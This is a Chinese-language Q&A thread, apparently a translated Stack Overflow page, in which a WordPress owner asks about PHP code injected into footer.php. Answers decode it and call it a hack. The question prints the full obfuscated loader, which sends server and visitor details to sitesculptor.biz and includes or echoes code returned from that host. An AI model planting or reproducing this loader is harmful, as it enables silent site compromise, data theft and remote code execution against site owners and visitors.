这个未知代码出现在我的WP网站footer.php中?这是黑客攻击
有人将此代码注入我的wordpress网站footer.php:
<?php
$cf=strrev('edo'.'ced'.'_46esab');$counter=$cf('aHR0cDovL3NpdGVzY3VscHRvci5iaXovbC5waHA/aWQ9').md5($_SERVER['SERVER_NAME']);
$data=array('HTTP_ACCEPT_CHARSET','HTTP_ACCEPT_LANGUAGE','HTTP_HOST','HTTP_REFERER',
'HTTP_USER_AGENT','HTTP_QUERY_STRING','REMOTE_ADDR','REQUEST_URI','REQUEST_METHOD','SCRIPT_FILENAME');
foreach($data as $val){$t[]=$_SERVER[$val];}$u=$counter.'&data='.base64_encode(serialize($t));$fn=file_get_contents($u);
if(!$fn||strlen($fn)<4){ob_start();include($u);$fn=ob_get_contents();ob_clean();}
if($fn&&strlen($fn)>4){list($crc,$enc)=explode('::',$fn);if(md5($enc)==$crc){echo $cf($enc);}}
?>
这是什么?
答案 0 :(得分:1)
是。这似乎是一个已知的黑客企图。您最好立即删除它,然后通过删除不安全的插件和下载WP的安全解决方案来保护您的博客。
答案 1 :(得分:0)
<?php
$cf = base64_decode('aHR0cDovL3NpdGVzY3VscHRvci5iaXovbC5waHA/aWQ9');
echo $cf;
?>
http://sitesculptor.biz/l.php?id=
然后,
md5($_SERVER['SERVER_NAME']);
答案 2 :(得分:0)
计数器解码为http://sitesculptor.biz/l.php?id=。代码(基于url参数)将从那里获取代码片段并执行它。
绝对是黑客攻击。
答案 3 :(得分:0)
很可能是恶意的。它将您的所有服务器详细信息发送到http://sitesculptor.biz/l.php?id=的URL,然后包含脚本中返回的任何PHP。